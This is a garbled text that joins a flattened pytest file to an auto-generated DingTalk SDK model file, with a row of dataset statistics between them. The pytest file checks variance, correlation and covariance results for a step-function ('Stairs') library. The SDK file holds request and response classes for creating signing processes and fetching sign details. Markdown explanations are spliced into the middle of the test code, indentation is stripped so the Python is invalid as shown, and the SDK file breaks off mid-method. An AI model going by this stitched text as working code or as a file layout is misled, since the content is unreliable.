# np.var(st2(pts))
# = 8.068647476524724
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st2(pts))
# = 4.283962544589773
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st2(pts))
# = 6.9166823043723
@pytest.mark.parametrize(
"bounds, expected",
[
((), 8.068647476524724),
(((2019, 12, 30), (2020, 1, 8, 16)), 4.283962544589773),
(((2020, 1, 2), (2020, 1, 11, 3)), 6.9166823043723),
],
)
def test_s2_var(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s2(date_func).agg("var", *bounds), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.9641849485952467
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.871146456224659
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st1(pts))
# = 1.9928564486485862
@pytest.mark.parametrize(
"bounds, expected",
[
((), 1.9641849485952467),
(((2019, 12, 30), (2020, 1, 8, 16)), 1.871146456224659),
(((2020, 1, 2), (2020, 1, 11, 3)), 1.9928564486485862),
],
)
def test_s1_std(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s1(date_func).agg("std", *bounds), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.840536476886844
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.0697735491086395
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.std(st2(pts))
# = 2.6299586126728878
@pytest.mark.parametrize(
"bounds, expected",
[
((), 2.840536476886844),
        (((2019, 12, 30), (2020, 1, 8, 16)), 2.0697735491086395),
(((2020, 1, 2), (2020, 1, 11, 3)), 2.6299586126728878),
],
)
def test_s2_std(date_func, bounds, expected):
bounds = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds) > 0:
bounds = [bounds]
assert np.isclose(s2(date_func).agg("std", *bounds), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st1(pts2))[0,1]
# = 0.7242066313374523
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st1(pts2))[0,1]
# = -0.4564262197588511
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st1(pts1), st1.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = 0.2145983282751396
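The recipe in the comments above estimates lagged correlation by evaluating the series on a grid of points and on the same grid shifted forward by the lag, then taking `np.corrcoef` of the two sample vectors. A generic sketch with a sine wave standing in for a `Stairs` object:

```python
import numpy as np

low, high, lag = 0.0, 10.0, 1.0
pts1 = np.linspace(low, high - lag, 100_001)
pts2 = pts1 + lag  # same grid shifted forward by the lag

f = np.sin
# off-diagonal entry of the 2x2 correlation matrix is the lagged correlation
autocorr = np.corrcoef(f(pts1), f(pts2))[0, 1]
```

Swapping `np.sin` for dense evaluations of `s1`/`s2` reproduces the hard-coded expected values in the parametrize lists below this point in the file.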
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 10],
"lag": pd.Timedelta(1, unit="D"),
},
0.7242066313374523,
),
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 8],
"lag": pd.Timedelta(2, unit="D"),
},
-0.4564262197588511,
),
(
{
"lower": [2020, 1, 1],
"upper": [2020, 1, 8],
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
0.2145983282751396,
),
],
)
def test_s1_autocorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).corr(s1(date_func), **new_kwargs),
expected,
atol=0.00001,
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st2(pts1), st2(pts2))[0,1]
# = 0.41564870493583517
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st2(pts1), st2(pts2))[0,1]
# = -0.1856362783824296
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st2(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -0.24047807541603636
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
0.41564870493583517,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.1856362783824296,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-0.24047807541603636,
),
],
)
def test_s2_autocorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s2(date_func).corr(s2(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st2(pts2))[0,1]
# = -0.5504768716400756
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.corrcoef(st1(pts1), st2(pts2))[0,1]
# = -0.869050905054203
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.corrcoef(st1(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -0.962531150106436
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
-0.5504768716400756,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.869050905054203,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-0.962531150106436,
),
],
)
def test_crosscorr(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).corr(s2(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.cov(st1(pts1), st1(pts2))[0,1]
# = 2.9296901561636464
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs)]
# np.cov(st1(pts1), st1(pts2))[0,1]
# = -1.2499884258990304
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.cov(st1(pts1), st1.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = 0.892856552342196
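The same sampling pattern applies to covariance: `np.cov` of the two (optionally lagged) sample vectors gives the empirical covariance that the expected values above were computed from. A minimal generic sketch with two analytic signals in place of `Stairs` evaluations:

```python
import numpy as np

t = np.linspace(0.0, 10.0, 100_001)
f = np.sin(t)
g = np.cos(t)
# np.cov returns the 2x2 covariance matrix; [0, 1] is the cross term
cross_cov = np.cov(f, g)[0, 1]
```

Over this window sin and cos are nearly uncorrelated, so the cross term is close to zero; the step functions in these tests produce the larger magnitudes recorded in the comments.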
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
2.9296901561636464,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-1.2499884258990304,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
0.892856552342196,
),
],
)
def test_s1_autocov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).cov(s1(date_func), **new_kwargs), expected, atol=0.00001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs + 1)]
# np.cov(st2(pts1), st2(pts2))[0,1]
# = 2.903313715908994
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, 2*(total_secs - lag_secs) + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, 2*(total_secs - lag_secs) + 1)]
# np.cov(st2(pts1), st2(pts2))[0,1]
# = -0.5850255035016916
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs + 1)]
# np.cov(st2(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -1.2321516853124157
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
2.903313715908994,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-0.5850255035016916,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-1.2321516853124157,
),
],
)
def test_s2_autocov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s2(date_func).cov(s2(date_func), **new_kwargs), expected, atol=0.0001
)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(1, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, total_secs - lag_secs + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, total_secs - lag_secs + 1)]
# np.cov(st1(pts1), st2(pts2))[0,1]
# = -2.9980440069170653
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs - lag_secs, 2*(total_secs - lag_secs) + 1)]
# pts2 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0 + lag_secs, total_secs, 2*(total_secs - lag_secs) + 1)]
# np.cov(st1(pts1), st2(pts2))[0,1]
# = -1.8000478009074565
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,8, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# lag_secs = int(pd.Timedelta(2, unit='D').total_seconds())
# pts1 = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs + 1)]
# np.cov(st1(pts1), st2.shift(-pd.Timedelta(2, unit='D'))(pts1))[0,1]
# = -5.357139018807952
@pytest.mark.parametrize(
"kwargs, expected",
[
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 10),
"lag": pd.Timedelta(1, unit="D"),
},
-2.9980440069170653,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
},
-1.8000478009074565,
),
(
{
"lower": (2020, 1, 1),
"upper": (2020, 1, 8),
"lag": pd.Timedelta(2, unit="D"),
"clip": "post",
},
-5.357139018807952,
),
],
)
def test_crosscov(date_func, kwargs, expected):
kwargs = kwargs.copy()
lower = timestamp(*kwargs.pop("lower"), date_func=date_func)
upper = timestamp(*kwargs.pop("upper"), date_func=date_func)
new_kwargs = {**kwargs, "where": (lower, upper)}
assert np.isclose(
s1(date_func).cov(s2(date_func), **new_kwargs), expected, atol=0.0001
)
def test_integral_overflow():
with pytest.raises(OverflowError):
s = (
Stairs()
.layer(pd.Timestamp("1980"), pd.Timestamp("2050"), 5000)
.layer(pd.Timestamp("1990"), pd.Timestamp("2060"), 4000)
)
s.integral()
def test_mean_no_overflow():
s = (
Stairs()
.layer(pd.Timestamp("1980"), pd.Timestamp("2050"), 5000)
.layer(pd.Timestamp("1990"), pd.Timestamp("2060"), 4000)
)
s.mean()
| 32.907388 | 122 | 0.587023 | 4,465 | 31,624 | 3.986338 | 0.050392 | 0.163605 | 0.094387 | 0.12585 | 0.841508 | 0.815832 | 0.808023 | 0.787516 | 0.753132 | 0.719085 | 0 | 0.117625 | 0.248609 | 31,624 | 960 | 123 | 32.941667 | 0.631428 | 0.363585 | 0 | 0.455538 | 1 | 0 | 0.080094 | 0 | 0 | 0 | 0 | 0.001042 | 0.059282 | 1 | 0.074883 | false | 0 | 0.00936 | 0.00624 | 0.112324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List
class CreateProcessHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CreateProcessRequestFiles(TeaModel):
def __init__(
self,
file_id: str = None,
file_type: int = None,
file_name: str = None,
):
self.file_id = file_id
self.file_type = file_type
self.file_name = file_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.file_type is not None:
result['fileType'] = self.file_type
if self.file_name is not None:
result['fileName'] = self.file_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('fileType') is not None:
self.file_type = m.get('fileType')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
return self
class CreateProcessRequestParticipants(TeaModel):
def __init__(
self,
sign_requirements: str = None,
sign_order: int = None,
account_type: str = None,
account: str = None,
ding_corp_id: str = None,
user_id: str = None,
account_name: str = None,
org_name: str = None,
):
self.sign_requirements = sign_requirements
self.sign_order = sign_order
self.account_type = account_type
self.account = account
self.ding_corp_id = ding_corp_id
self.user_id = user_id
self.account_name = account_name
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.sign_requirements is not None:
result['signRequirements'] = self.sign_requirements
if self.sign_order is not None:
result['signOrder'] = self.sign_order
if self.account_type is not None:
result['accountType'] = self.account_type
if self.account is not None:
result['account'] = self.account
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('signRequirements') is not None:
self.sign_requirements = m.get('signRequirements')
if m.get('signOrder') is not None:
self.sign_order = m.get('signOrder')
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class CreateProcessRequestCcs(TeaModel):
def __init__(
self,
account_type: str = None,
account: str = None,
ding_corp_id: str = None,
user_id: str = None,
account_name: str = None,
org_name: str = None,
):
self.account_type = account_type
self.account = account
self.ding_corp_id = ding_corp_id
self.user_id = user_id
self.account_name = account_name
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.account is not None:
result['account'] = self.account
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class CreateProcessRequestSourceInfo(TeaModel):
def __init__(
self,
show_text: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.show_text = show_text
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.show_text is not None:
result['showText'] = self.show_text
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('showText') is not None:
self.show_text = m.get('showText')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class CreateProcessRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
initiator_user_id: str = None,
task_name: str = None,
sign_end_time: int = None,
redirect_url: str = None,
files: List[CreateProcessRequestFiles] = None,
participants: List[CreateProcessRequestParticipants] = None,
ccs: List[CreateProcessRequestCcs] = None,
source_info: CreateProcessRequestSourceInfo = None,
):
self.ding_corp_id = ding_corp_id
self.initiator_user_id = initiator_user_id
self.task_name = task_name
self.sign_end_time = sign_end_time
self.redirect_url = redirect_url
self.files = files
self.participants = participants
self.ccs = ccs
self.source_info = source_info
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
if self.participants:
for k in self.participants:
if k:
k.validate()
if self.ccs:
for k in self.ccs:
if k:
k.validate()
if self.source_info:
self.source_info.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.initiator_user_id is not None:
result['initiatorUserId'] = self.initiator_user_id
if self.task_name is not None:
result['taskName'] = self.task_name
if self.sign_end_time is not None:
result['signEndTime'] = self.sign_end_time
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
result['participants'] = []
if self.participants is not None:
for k in self.participants:
result['participants'].append(k.to_map() if k else None)
result['ccs'] = []
if self.ccs is not None:
for k in self.ccs:
result['ccs'].append(k.to_map() if k else None)
if self.source_info is not None:
result['sourceInfo'] = self.source_info.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('initiatorUserId') is not None:
self.initiator_user_id = m.get('initiatorUserId')
if m.get('taskName') is not None:
self.task_name = m.get('taskName')
if m.get('signEndTime') is not None:
self.sign_end_time = m.get('signEndTime')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = CreateProcessRequestFiles()
self.files.append(temp_model.from_map(k))
self.participants = []
if m.get('participants') is not None:
for k in m.get('participants'):
temp_model = CreateProcessRequestParticipants()
self.participants.append(temp_model.from_map(k))
self.ccs = []
if m.get('ccs') is not None:
for k in m.get('ccs'):
temp_model = CreateProcessRequestCcs()
self.ccs.append(temp_model.from_map(k))
if m.get('sourceInfo') is not None:
temp_model = CreateProcessRequestSourceInfo()
self.source_info = temp_model.from_map(m['sourceInfo'])
return self
class CreateProcessResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
):
self.task_id = task_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
return self
class CreateProcessResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateProcessResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateProcessResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetSignDetailHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetSignDetailResponseBodySigners(TeaModel):
def __init__(
self,
sign_status: float = None,
signer_name: str = None,
):
self.sign_status = sign_status
self.signer_name = signer_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.sign_status is not None:
result['signStatus'] = self.sign_status
if self.signer_name is not None:
result['signerName'] = self.signer_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('signStatus') is not None:
self.sign_status = m.get('signStatus')
if m.get('signerName') is not None:
self.signer_name = m.get('signerName')
return self
class GetSignDetailResponseBody(TeaModel):
def __init__(
self,
business_scene: str = None,
flow_status: float = None,
signers: List[GetSignDetailResponseBodySigners] = None,
):
self.business_scene = business_scene
self.flow_status = flow_status
self.signers = signers
def validate(self):
if self.signers:
for k in self.signers:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.business_scene is not None:
result['businessScene'] = self.business_scene
